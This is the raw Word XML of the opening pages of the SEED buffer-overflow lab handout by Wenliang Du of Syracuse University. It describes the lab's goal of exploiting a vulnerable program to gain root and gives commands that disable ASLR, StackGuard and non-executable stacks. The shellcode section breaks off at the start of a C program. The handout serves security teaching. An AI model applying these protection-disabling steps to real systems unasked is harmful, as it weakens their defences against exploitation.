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Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:88.935997pt;margin-top:18.814690pt;width:438.8pt;height:75.55pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15728640;mso-wrap-distance-left:0;mso-wrap-distance-right:0" coordorigin="1779,376" coordsize="8776,1511">
            <v:line style="position:absolute" from="1779,380" to="10554,380" stroked="true" strokeweight=".398pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="1783,1878" to="1783,384" stroked="true" strokeweight=".398pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="10550,1878" to="10550,384" stroked="true" strokeweight=".398pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:line style="position:absolute" from="1779,1882" to="10554,1882" stroked="true" strokeweight=".398pt" strokecolor="#000000">
              <v:stroke dashstyle="solid"/>
            </v:line>
            <v:shape style="position:absolute;left:1846;top:634;width:8660;height:1197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8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development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document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is/was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funded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by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three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grants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National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Science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Foundation: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Awards No. 0231122 and 0618680 from TUES/CCLI and Award No. 1017771 from Trustworthy Computing.</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr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Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free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Documentation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License,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Version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1.2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any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later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version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published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by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Software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Foundation.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copy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license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can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found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hyperlink r:id="rId6">
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="20"/>
                        </w:rPr>
                        <w:t>http://www.gnu.org/licenses/fdl.html.</w:t>
                      </w:r>
                    </w:hyperlink>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:1846;top:389;width:4979;height:382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Co</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-2"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>p</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>yright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MS UI Gothic" w:hAnsi="MS UI Gothic"/>
                        <w:spacing w:val="-144"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>Ⓧ</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:w w:val="99"/>
                        <w:position w:val="1"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>c</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:position w:val="1"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="5"/>
                        <w:position w:val="1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2006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-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2014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pacing w:val="-16"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>W</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>enliang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Du,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Syracuse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Un</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>i</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-3"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>v</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>ersit</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-13"/>
                        <w:w w:val="99"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>y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590" w:val="left" w:leader="none"/>
          <w:tab w:pos="591" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="114" w:after="0"/>
        <w:ind w:left="590" w:right="0" w:hanging="431"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="231"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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objective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lab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gain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first-hand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>experience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buffer-overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulner-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ability by putting what they have learned about the vulnerability from class into action. Buffer overflow is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fixed length buffers. This vulnerability can be utilized by a malicious user to alter the flow control of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>program, even execute arbitrary pieces of code. This vulnerability arises due to the mixing of the storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flow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overflow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change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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="2"/>
        <w:ind w:left="160" w:right="437" w:firstLine="338"/>
        <w:jc w:val="both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lab,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>students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given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buffer-overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerability;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>their</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>task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develop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the attacks, students</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will be guided to walk through several protection schemes that have been implemented in the operating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>system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counter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>against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buffer-overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10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evaluate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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schemes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or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explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>why.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4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590" w:val="left" w:leader="none"/>
          <w:tab w:pos="591" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="590" w:right="0" w:hanging="431"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="221" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="247" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>You can execute the lab tasks using our pre-built </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>virtual machines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and other Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>distributions have implemented several security mechanisms to make the buffer-overflow attack difficult. To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>simply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attacks,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disable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first.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52" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Address Space Randomization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>and several other Linux-based systems uses address space ran-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>domization to randomize the starting address of heap and stack. This makes guessing the exact addresses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. In this lab, we disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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commands: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421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su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="261" w:lineRule="auto" w:before="21"/>
        <w:ind w:left="421" w:right="4557" w:firstLine="261"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>Password: (enter root password)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#sysctl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-w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kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="419"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>The StackGuard Protection Scheme.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>The GCC compiler implements a security mechanism called ”Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard” to prevent buffer overflows. In the presence of this protection, buffer overflow will not work. You</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can disable this protection if you compile the program using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-fno-stack-protector </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>switch. For example,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>compile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example.c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Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>disabled,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command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="179"/>
        <w:ind w:left="421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gcc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-fno-stack-protector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example.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId5"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="700" w:top="1280" w:bottom="280" w:left="1280" w:right="1000"/>
          <w:pgNumType w:start="1"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="249" w:lineRule="auto" w:before="104"/>
        <w:ind w:left="160" w:right="437"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Non-Executable Stack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>used to allow executable stacks, but this has now changed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>the binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e.,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>they need to mark a field in the program header.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Kernel or dynamic linker uses this marking to decide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>whether to make the stack of this running program executable or non-executable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This marking is done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>automatically by the recent versions of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>, and by default, the stack is set to be non-executable. To change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that,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option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compiling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>programs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="212"/>
        <w:ind w:left="421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executable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stack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:ind w:left="421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6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="121"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-o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test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test.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="421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non-executable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stack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:ind w:left="421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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>noexecstack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="120"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>-o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test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test.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="697" w:val="left" w:leader="none"/>
          <w:tab w:pos="698" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="697" w:right="0" w:hanging="538"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="256" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="160" w:right="439"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before you start the attack, you need a shellcode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>A shellcode is the code to launch a shell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It has to be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>loaded into the memory so that we can force the vulnerable program to jump to it. Consider the following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>program:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="542" w:lineRule="exact" w:before="12"/>
        <w:ind w:left="160" w:right="7436"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-33"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-129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main(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
